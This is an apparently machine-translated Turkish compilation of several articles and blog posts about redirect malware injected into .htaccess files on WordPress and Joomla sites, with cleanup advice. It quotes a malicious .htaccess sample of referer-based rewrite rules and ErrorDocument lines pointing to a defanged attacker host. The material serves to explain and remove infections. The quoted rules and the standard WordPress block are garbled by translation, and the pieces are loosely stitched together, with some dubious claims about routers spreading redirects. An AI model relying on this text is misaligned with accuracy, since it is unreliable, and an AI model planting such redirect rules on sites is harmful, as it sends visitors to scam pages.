htaccess mobil yönlendirme virüsü. Truva atı virüsü JS:WordPress blogunda Yönlendirici-MC (mobil yönlendirme). Bu virüs ne işe yarıyor
Virüsün yeni formu Bilmediğimi görenler barındırılan siteleri büyük ölçüde etkiler güvenilmeyen sunucular, hesap/alt hesap kullanıcılarının birbirlerini "görebildiği" yer. Özellikle barındırma hesaplarının tümü "klasöründe yapılır" sanal konaklar"Yazı ve Hukuk kullanıcı klasörleri"sanal alan adları" çoğu durumda genel kullanıcıya...bayiye verilir. Bu, tipik web sunucularını kullanmayan bir yöntemdir WHM/CPaneli.
Action.htaccess - .htaccess Hack'i
Virüs dosyaları etkiler .htaccess sitenin kurbanları. Satır eklendi / Direktiflerİle ziyaretçileri yönlendir(Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace vb. trafiği yüksek site ve portallar baz alınarak) sunan bazı sitelere " antivirüs. "Bu sahte antivirüs, Önsözde bunun hakkında yazdım.
Görünüşe göre bu .htaccess kurbanlar: ( Aşağıdaki bağlantıların içeriğine erişilemiyor )
ErrorDocument 500 hxxp://wwww.peoriavaskülersurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavaskülersurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavaskülersurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=3Yeniden Yazma Motoru Açık
RewriteCond%(HTTP_REFERER). *Yandex. *$
RewriteCond%(HTTP_REFERER). * Sınıf arkadaşları. *$
RewriteCond%(HTTP_REFERER). * Temas halinde. *$
RewriteCond%(HTTP_REFERER). * Rambler. *$
RewriteCond%(HTTP_REFERER). *Tüp. *$
RewriteCond%(HTTP_REFERER). *Wikipedia. *$
RewriteCond%(HTTP_REFERER). * Blogcu. *$
RewriteCond%(HTTP_REFERER). * Baidu. *$
RewriteCond%(HTTP_REFERER). * Qq.com. *$
RewriteCond%(HTTP_REFERER). *Benim alanım. *$
RewriteCond%(HTTP_REFERER). *Twitter'da. *$
RewriteCond%(HTTP_REFERER). *Facebook. *$
RewriteCond%(HTTP_REFERER). *Google. *$
RewriteCond%(HTTP_REFERER). *Canlı. *$
RewriteCond%(HTTP_REFERER). *AOL. *$
RewriteCond%(HTTP_REFERER). *Bing. *$
RewriteCond%(HTTP_REFERER). *Amazon. *$
RewriteCond%(HTTP_REFERER). * Ebay. *$
RewriteCond%(HTTP_REFERER). * LinkedIn. *$
RewriteCond%(HTTP_REFERER). *Flickr. *$
RewriteCond%(HTTP_REFERER). *LiveJasmin. *$
RewriteCond%(HTTP_REFERER). * Şöyle böyle. *$
RewriteCond%(HTTP_REFERER). *Çift tıklama. *$
RewriteCond%(HTTP_REFERER). * Pornhub. *$
RewriteCond%(HTTP_REFERER). *orkut. *$
RewriteCond%(HTTP_REFERER). * Canlı dergi. *$
RewriteCond%(HTTP_REFERER). *Wordpress'tir. *$
RewriteCond%(HTTP_REFERER). *Yahoo. *$
RewriteCond%(HTTP_REFERER). *Sormak. *$
RewriteCond%(HTTP_REFERER). *Heyecanlandırmak. *$
RewriteCond%(HTTP_REFERER). *Altavista. *$
RewriteCond%(HTTP_REFERER). *MSN. *$
RewriteCond%(HTTP_REFERER). *Netscape. *$
RewriteCond%(HTTP_REFERER). *Hotbot. *$
RewriteCond%(HTTP_REFERER). * Git. *$
RewriteCond%(HTTP_REFERER). * Bilgi arama. *$
RewriteCond%(HTTP_REFERER). * Anne. *$
RewriteCond%(HTTP_REFERER). *Tüm web. *$
RewriteCond%(HTTP_REFERER). *Lycos. *$
RewriteCond%(HTTP_REFERER). * Aramak. *$
RewriteCond%(HTTP_REFERER). * MetaCrawler. *$
RewriteCond%(HTTP_REFERER). *Posta. *$
RewriteCond%(HTTP_REFERER). * Köpek yığını. *$
Yeniden Yazma Kuralı. *RewriteCond%() REQUEST_FILENAME!-E
RewriteCond%() REQUEST_FILENAME!-D
RewriteCond%() * REQUEST_FILENAME Jpg $ |!. *. Gif$ | *. png$
Yeniden Yazma%(HTTP_USER_AGENT). *Pencereler*.
Yeniden Yazma Kuralı. *
WordPress kullananlar dosyada bu satırları bulacaktır .htaccess itibaren public_html. Ayrıca virüs oluşturur. Htaccess dosyası aynı klasörde WP içeriği.
*Bunun yerine peoriavaskülersurgery.com'un göründüğü durumlar da vardır. dns.thesoulfoodcafe.com veya diğer adresler.
Bu virüs ne işe yarıyor?
Yönlendirildikten sonra ziyaretçiler şu mesajla kollarını açarak karşılanır:
Dikkat!
Bilgisayarda virüs ve kötü amaçlı yazılımların varlığına dair çeşitli işaretler bulunur. Virüs koruma sisteminizin acilen kontrol edilmesi gerekiyor!
Güvenlik sistemi, bilgisayarınızda virüslere ve kötü amaçlı yazılımlara karşı hızlı ve ücretsiz bir tarama gerçekleştirecektir.
Hangi tuşa basarsak basalım sayfaya yönlendiriliyoruz" Benim bilgisayarım"Taklit etmek için yaratıldı XP tasarımı. Bu, otomatik olarak bir "tarama" başlatır ve sonunda "virüslü" olduğunu tespit ederiz.
Tamam veya İptal düğmesine tıkladıktan sonra başlayacaktır. indirmek Dosyalar setup.exe. Bu setup.exe sahte bir antivirüs programıdır sistemi etkiliyor. Bazı kötü amaçlı yazılımların yüklenmesi, bağlantıların tehlikeye atılmasından daha fazla yayılır ve buna ek olarak bunlar antivirüs yazılımı(hepsi yanlış) kurbana satın alma teklif ediliyor.
Virüsle daha önce temas etmiş olanlar bu formu kullanabilir. Ek olarak, sabit sürücünün tamamının taranması önerilir. Tavsiye etmek Kaspersky internet güvenliği veya Kaspersky Anti-Virüs.
Bu tür virüs, işletim sistemi işletim sisteminin ziyaretçisine bulaşır Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 ve Windows 95. Şu ana kadar Windows Vista ve Windows 7 işletim sistemlerinde bilinen bir enfeksiyon vakası bulunmamaktadır.
Bu virüsü nasıl yok edebiliriz. Htaccess dosyasının sunucuya aktarılması ve bulaşmanın nasıl önleneceği.
1. Şüpheli dosyaların analizi ve kodların silinmesi. Dosyaya yalnızca dokunulmadığından emin olmak için .htaccess Mecbursun tüm dosyaları analiz et .php si . J'ler.
2. Dosyanın üzerine yazın. Htaccess ve kurulum CHMOD 644 veya 744 yalnızca yazma erişimiyle kullanıcı sahibi.
3. Klasördeki bir web sitesi için barındırma hesabı oluştururken / Ev veya /web kökü Bu, otomatik olarak genellikle bir kullanıcı adına sahip olan bir klasör oluşturacaktır ( Cpanel, FTP kullanıcısı Vesaire.). Bir kullanıcıdan diğerine veri kaydını ve virüs aktarımını önlemek için her kullanıcının klasörünün şu şekilde ayarlanması önerilir:
CHMOD 644 veya 744, 755 - 644 gösterilmiştir.
Chaun-R numarası_kullanıcı numarası_klasörü.
CHGRP-R numarası_kullanıcı numarası_klasör
LS-hepsi doğru yapılıp yapılmadığını kontrol etmenin yolları. Bunun gibi bir şey görünmelidir:
Dinamik hoparlörün dinamikleri drwx-x-x 12 4096 6 Mayıs 14: dinamikler 51 /
drwx-x-x 10 duran duran 4096 7 Mart 07: 46 duran /
drwx-x-x 12 Tüp Test Tüpü 4096 29 Ocak 11:23 Tüp /
drwxr-xr-x 14 Ekspres 4096 26 Şubat 2009 ekspres /
drwxr-xr-x 9 ezo ezo 4096 19 Mayıs 01: 09 ezo /
drwx-x-x 9 çiftlik 4096 çiftlik 19 22: 29 çiftlik /
Yukarıdaki FTP kullanıcılarından biri varsa Virüslü dosyalar Ana bilgisayarın başka bir kullanıcısına virüs gönderemez. Bir web sunucusunda barındırılan hesapları korumaya yönelik minimum güvenlik önlemi.
Bu virüsten etkilenen alanların ortak unsurları.
Etkilenen tüm alanlar, ziyaretçileri "/ içeren alan adına sahip sitelere yönlendirir" main.php? e = 4&sa ".
Bu " virüs. htaccess"Herhangi bir CMS'yi etkiler ( Joomla, WordPress, PHPBB vb.) kullanarak .htaccess.
. Htaccess Yönlendirme Virüsü Hack &.
Kötü Amaçlı/Virüs - .htaccess "yeniden yazma" ve yönlendirmeGeçen Pazartesi, Yandex'in iki projemde keşfettiği kötü amaçlı mobil yönlendirmeye karşı altı aylık destansı mücadelem sona erdi.
(İşte hikayem iki bölüm halinde...)
Buradan resim: http://rebill.me/showthread.php?t=1804
Kötü amaçlı mobil yönlendirmeyle ilgili daha birçok resim ve kelime var.
Pek de harika olmayan bir sabah bunu aldım Yandex.Webmaster'dan mektup:
Merhaba, ***!
Web sitenizin **** sayfalarında ziyaretçiler için tehlikeli olabilecek kod tespit edildi. Bir siteyi ziyaret ederken bu kodun çalıştırılması, kullanıcı için istenmeyen sonuçlara yol açabilir: bilgisayara kötü amaçlı yazılım bulaşması, kaynaklarının yetkisiz kullanımı, kişisel verilerin zarar görmesi veya çalınması.
Site şu anda arama sonuçlarında "Bu site bilgisayarınızın güvenliğini tehdit edebilir" etiketiyle görünüyor.
Yandex, site içeriğini hiçbir şekilde değerlendirmemekte ve sahiplerinin bilgisi dışında siteye virüs bulaşabileceği konusunda kullanıcıları uyarmaktadır.
Lütfen kötü amaçlı kodu kaldırın. Yeni bir tarama sırasında kod bulunamazsa arama sonuçlarındaki işaret kaldırılacaktır. İşareti mümkün olan en kısa sürede kaldırmak için kodu sildikten hemen sonra sitenin yeniden kontrol edilmesini talep edebilirsiniz.—
Samimi olarak,
Yandex.Web Yöneticisi
http://webmaster.yandex.ru
Projemde kötü amaçlı kod olduğuna hemen inanamadım; davranışsal (davranışsal) algoritmasıyla Yandex'in bir hata yaptığına ve giderek daha popüler hale gelen projemi yanlışlıkla suçladığına inanmak çok daha kolaydı... Daha dikkatli okuduktan sonra Arama sonuçlarından virüslü siteme gitmeye çalıştığımda “Güvenlik” sekmesindeki bilgilerde Yandex tarafından hangi yorumların verildiğine baktığımda bunun bununla ilgili olduğunu fark ettim. kötü amaçlı mobil yönlendirme hakkında.
Mobil cihazlarda denemelere başladım: Google arama motorundan web sitemin ana sayfasına gittim, içerikli sayfaya gittim ve... tek bir tuşla aloobe.com gibi adresi olan belirsiz bir siteye yönlendirildim " Adobe Player'ı ACİL GÜNCELLEMEMİZ GEREKİYOR” - bu Yandex'in haklı benim yanıldığımın kanıtı oldu...
Bu kötü niyetli mobil yönlendirmeyle mücadele etmenin, projelerimin saflığı için mücadele etmenin bana neye mal olduğunu Tanrı bilir... Dağlarca literatürü yeniden okudum, widget'ları ve eklentileri kaldırdım, temaları değiştirdim, bir umutsuzluk anında barındırıcıyı bile değiştirdim Yıllardır test edilen kötü amaçlı yönlendirme arayışı, sanki Veritabanı içerisinde ve projelere hizmet veren klasörlerde gerçekleştirildi.
Sonunda her şey gülünç derecede basit çıktı ama bunu bir sonraki yazımda anlatacağım ve bugün size açığı kapatan eklentiden bahsedeceğim. Siteyi yeniden kontrole gönderdim, Yandek sitemi virüslü olarak işaretlemeyi bıraktı, okuyucular geri döndü ve bu sorun artık projelerimde oluşmuyor! Daha doğrusu sorun devam etti (çünkü buna bir çözüm bulmak altı ayımı aldı), ama okuyucularımdan izole edildi ve sitelerime gelen ziyaretçilerin hiçbiri dolandırıcıların pençesine düşemedi.
Eklentinin adı Verve Mobil. Bu noktada eklentinin linkini verip yazıyı sonlandıracaktım ama wordpress.org'da bu eklentiden geriye tek bir tartışma kaldı:
http://wordpress.org/support/plugin/verve-mobile-plugin.
Bu makaleyi onurlu bir şekilde bitirmek için kaydettim bu popüler eklenti. İndirebilirsin. Elbette destek sağlayamayacağım ama projelerimde sorunsuz çalışıyor, mobil cihazları tanıyor ve onlara site içeriğini "mobil cihazlardan görüntüleme için" özel bir şablonda veriyor.
Eklentinin keşfettiğim tek dezavantajı, eklenti etkinleştirildiğinde bunu yapamamamdı. OpenId kullanarak yetkilendirme için gerekli olan Verve Mobile'ı birkaç dakikalığına devre dışı bırakarak bu dezavantajı aştım.
PS Eklentiyi yüklemeden önce şunlardan emin olun: .htaccess Sitenizin kök dizininde bulunan dosya, WordPress girişine ek olarak şunları içerir:
# WordPress'e BAŞLAYIN
Yeniden Yazma Motoru Açık
Yeniden Yazma Tabanı /
Yeniden Yazma Kuralı ^index\.php$ – [L]
Yeniden Yazma Koşulu %(REQUEST_FILENAME) !-f
Yeniden Yazma Koşulu %(REQUEST_FILENAME) !-d
Yeniden Yazma Kuralı. /index.php [L]
sadece bir nedenden dolayı oraya kendi girdiğiniz şey ve gereksiz veya açıklanamaz hiçbir şey yok.
.htaccess dosyasında bazı şüpheli yönlendirmeler bulursanız, içindeki tüm gereksiz şeyleri kaldırın; bu, büyük olasılıkla kötü amaçlı mobil yönlendirmeler sorununa bir çözüm olacaktır. Dikkatli olun ve .htaccess dosyasının en altına gidin; bazen saldırganlar yönlendirme kodlarının ilk sayfada görünmemesi için buraya çok sayıda boş satır ekler.
Devam edecek…
Dün bütün gün aceleyle ve telaşla oradan oraya koşuşturuyordum ve öyle oldu ki ancak şimdi tamamen özgürdüm, bu yüzden önceki akşam için vaat edilen notun yayınlanması biraz gecikti.
İki gün önce son günlerde başıma gelen sorunlardan kısaca bahsetmiştim, şimdi de bir önceki yazımda odaklandığım durumu, sitelerimdeki virüsleri anlatmak niyetindeyim.
Genel olarak durum böyleydi.
10 Kasım günü saat 17.00 sıralarında Yandex'den konuyla ilgili bir bildirim geldi. “Sitede potansiyel olarak tehlikeli kod tespit edildi”, sitenin sayfalarında keşfedildi. Yandex'e göre bu kod ziyaretçiler için tehlikeli olabilir ve bu nedenle arama sonuçlarında sitem işaretiyle görüntülendi.
Elbette bu durum bana uymuyordu ve sitemi virüslerin görünümünü etkileyebilecek yabancı kod ve diğer "çöpler" açısından kontrol etmek için acele ettim.
Bu mektupla birlikte hesabıma para yatırıldığına dair bir bildirim aldım.
Mesaj metni:
Abone hesabınız şu miktarda bir ödeme aldı: 0 rub.
ödeme türü: Hostland.ru pahasına
ve şu miktarda bonus yatırıldı: 1668 ruble.
Ayrıca şu miktarda alan adı bonusu da aldınız: 1
Öyle olsa bile, sitelerimde artık gerçekten yönlendirme yok; sorun bulundu ve düzeltildi, ancak olanlara gelince, kim bulmaz ki?
Tüm bunlara rağmen, özellikle de sonunda her şeyi çözmeyi ve sözde sıkıntılardan kurtulmayı başardığımız için, ev sahipliğimin çalışmasından hala memnunum. Hesabımı yenilemek benim için önemsiz bir an değildi ve yüzleşmek zorunda kaldığım onca şeyden sonra bunun çok uygun olduğunu düşünüyorum.
Notta, kötü amaçlı kod arama sürecinde ve müşteri destek uzmanlarının tavsiyesi üzerine henüz hiçbir yerde bahsetmedim. Bilgisayarımda virüs olup olmadığını kontrol etmem gerekiyordu. Tüm bunlara ek olarak, çeşitli çevrimiçi tarayıcılar kullanarak sitemde virüs olup olmadığını kontrol ettim, bu da doğal olarak ek süre gerektirdi ve bunun boşa gitmediğine inanıyorum - aşırı özgüvenin kimseye zararı yoktur.
Sitede herhangi bir kötü amaçlı kod tespit edilmedi
Artık tüm sitelerimin işlevselliği geri yüklendi, sitelerde virüs veya yönlendirme yok, Yandex arama motorundan gelen tüm kısıtlamalar blogdan kaldırıldı - genel olarak her şey yolunda. Her şeyin iyi bitmesi iyi ama genel olarak ilginç bir durum ortaya çıktı.
Peki, şef eğitimi almış bir kişinin, profesyonel programcılara ekipmanlarında bir sorun olduğunu kanıtladığı bu hikayeyi beğendiniz mi?
Beni atmosferle eğlendirmeyi başardı ve hesabımı yenileyerek beni memnun etmeyi başardı, yeni bilgi ve deneyimler ekledi, ancak en tatsız şey beni tedirgin etmesiydi, ama gergin olmamam gerekiyor - bunun üzerimde kötü bir etkisi var iyiliğim!
Genel olarak, Tanrı bir başkasının aynı sorunla karşılaşmasını yasakladı, çünkü son ana kadar sadece siz aptal olarak kabul edileceksiniz.
Joomla'da arama yönlendirme virüsü nasıl tedavi edilir
Joomla'da arama yönlendirme virüsü nasıl tedavi edilir
28.04.2016
Bir Joomla web sitesini yönetirken, herhangi bir saldırıdan sonra sistemi periyodik olarak dezenfekte etmeniz gerekir. En rahatsız edici olanlardan biri, site bir kabuk tarafından kırıldığında ve ardından arama yönlendirme ekleri eklendiğinde, sitenizin arama motorunda göründüğü ancak kullanıcıyı porno veya İslami sitelere yönlendirdiği sözde arama yönlendirme virüsüdür. . Sonuç olarak, geçişten sonra aşağıdaki mesajı alırsınız:
Ardından arama motoru, sitenize virüs bulaştığını veya saldırıya uğradığını belirten benzer bir mesaj vermeye başlayacaktır. Ve Yandex'de konumunuzu bile kaybedeceksiniz. Sonuç olarak trafik kaybettiniz, müşteri kaybı yaşadınız ve sipariş eksikliği yaşadınız.
Kurtarma prosedürü.
1. Yedekleyin ve indirin.
2. Barındırmada antivirüs kontrolü yoksa, indirilen yedeği antivirüsle çalıştırın. Kabuk virüsü dosyalarını buluyoruz, benim durumumda bu PHP.Shell.387. Bu, kontrol sisteminin güvenliğindeki bir "delikten" yararlanan bir virüs türüdür.
3. Barındırmadaki virüs dosyalarını silin.
4. Yönetici panelindeki, FTP'deki şifreleri değiştirin
5. Truva atlarını aramak herhangi bir sonuç vermediğinden ve PHP kodunun nereye yerleştirildiğini manuel olarak aramak oldukça uzun sürdüğünden ve her zaman etkili olmadığından, bir yedek karışım yapıyorum. Mix, virüslerin bulaşmasından önce sitenin herhangi bir dosya yedeğidir, veritabanı yedekten değil güncel kalır, ardından klasörü yeni yedekten alırız Görüntüler resimler ve klasörle bileşenlercom_jshoppingfilesimg_productsürün fotoğrafları nerede?
Sonuç: Sonuçtan memnunuz.
Not: Yedekleme yoksa ne yapmalı? veya bunun için uzmanları dahil edin. Belki bir barındırma yedeği yardımcı olabilir, ancak otomatik olarak üzerine yazılacak ve virüs içereceğinden büyük olasılıkla sizi kurtarmayacaktır.
Daha sonraki önleme:
1. Tasarrufun tutumlu olması gerekmez. Mümkünse kontrol sistemini değiştirin.
2. Kesinlikle hostingi değiştirin. Bu konuda eksik kalmamalısınız. Timeweb deneyimime göre aynı Joomla iki kez bozuldu, ancak bu sorunun yarısı. Önemli olan, barındırma hizmetinin sunucularını üç ayda bir virüslere karşı taramamasıydı. Günlük antivirüs taramaları çalıştıran bir barındırma kullanmanızı öneririm ve ayrıca ücretsiz manuel antivirüs tarama hizmeti de mevcuttur. Örneğin, bu reg.ru
3. FTP şifrelerini kaydetmeyin.
Herkes muhtemelen virüs sitelerine otomatik yönlendirmeyle karşı karşıya kalmıştır. Virüslü spam e-postayı atlamanız yeterlidir; Yönlendirme tam oradadır. Bu yazıda Chrome tarayıcısında, Yandex Tarayıcıda, Opera ve Mozilla'da yönlendirmenin ne olduğuna ve nasıl kaldırılacağına bakacağız.
Yönlendirme nedir? Aslında yönlendirme, bir siteden diğerine otomatik olarak yapılan bir yönlendirmedir. Yönlendirme, amacına uygun olarak bir sitenin alan adını değiştirdiği durumlarda kullanılır. Örneğin, bir çevrimiçi mağaza veya ticari site taşınmış ve eski adresi ziyaret eden müşterileri kaybetmemek için bir yönlendirme ayarlanmıştır. Ancak uzun süredir var olan tanınmış bir siteye gittiğinizde ve aniden Vulcan sanal kumarhanesinin sitesine yönlendirilirseniz viral bir yönlendirmeyle karşı karşıya olduğunuz anlamına gelir.
Genel olarak Redirect'in tehlikeli bir virüs olmadığı bilinmektedir: bilgisayara herhangi bir zarar vermez ancak çok can sıkıcıdır, ayrıca tarayıcıyı yavaşlatır. Üstelik eğer siz de benim gibi boş zamanlarınızda oyuncaklarla oynamayı seviyorsanız bunun olumsuz etkisini hemen fark edeceksiniz. Bu virüsün ilk belirtilerinde ondan mümkün olduğunca çabuk kurtulmanız gerekir.
Bu Yönlendirme virüsünün sizde olduğunu nasıl belirleyebilirim?
- Tarayıcınız yavaşlıyor.
- Bazen bir web sitesine girdiğinizde bir reklam sayfasına yönlendirilirsiniz.
- Oldukça beklenmedik bir şekilde, açık sayfada reklam afişleri beliriyor.
Yönlendirmeyi kaldırmak için öncelikle önbelleği temizlemeyi deneyebilirsiniz. Bazen sorun yönlendiricide gizlenmiş olabilir. Virüs cihazınızda önbelleğe alındığından, onu başka birinin yönlendiricisindeki bir yerden almış, eve getirmiş ve yönlendiricinize bağlı tüm ekipmana bulaşmış olabilirsiniz. Daha sonra yönlendiriciyi temizlemeniz ve şifreleri değiştirmeniz gerekir. Daha sonra tüm cihazların önbelleklerini temizleyin. Bu işe yaramazsa, tüm sistemi iyice temizlemek için birkaç dakika ayırmanız gerekecektir. Yönlendirmenin ne olduğunu bulduk, şimdi bir sonraki aşamaya geçiyoruz: yönlendirmeleri temizleme.
Yönlendirme nasıl kaldırılır
Redirect'i siteden nasıl kaldırdım?İlk olarak, güvenli tarafta olmak için bilgisayardaki tüm önemli verileri çıkarılabilir bir sabit sürücüye kaydettim. Daha sonra eski antivirüsü kaldırdım ve yenisini yükledim. Geleneksel Dr.Web veya NOD32'yi kurabilirsiniz. Bir yönlendirmeyle bu enfeksiyondan oldukça başarılı bir şekilde kurtulan bir arkadaşımın övdüğü Avast'ı denemeye karar verdim. Henüz SpyHunter ve CCleaner gibi temizleme uygulamalarınız yüklü değilse tembel olmayın. Kayıt defterini temizlemenize yardımcı olacaklar.
- Bu nedenle, önce “Görev Yöneticisi” ni açın ve bilinmeyen tüm işlemleri kapatın.
- Antivirüs programıyla tarama yapıyoruz. 5 dakikadan yarım saate kadar sürebilir.
- Tüm sabit sürücüleri ve tarayıcıları kontrol ediyoruz.
- Tedavi edilemeyen tüm kötü amaçlı yazılımları tedavi ediyoruz; yalnızca onları kaldırıyoruz. Bu aşamada yeniden başlatmaktan kaçınmalısınız.
- SpyHunter veya CCleaner kullanarak tam sistem taraması gerçekleştiriyoruz.
- Tarama işlemi sırasında sistem yeniden yeniden başlatmayı teklif edecek - biz reddediyoruz. Tüm kötü amaçlı nesneleri temizliyoruz.
Çoğu durumda, yönlendirme sizi arama motorları gibi reklam veren veya sahte hizmetler içeren sitelere yönlendirir. Bu tür yönlendirmeleri kaldırmak için zaten birkaç düzine talimat tanımladım. Bu nedenle aşağıdaki tüm adımları takip etmeniz ve yönlendirildiğiniz viral siteye yönelik makaleyi okumanız gerekmektedir. Bunun tekrar yaşanmasını önlemek için.
Açılacak en popüler siteler: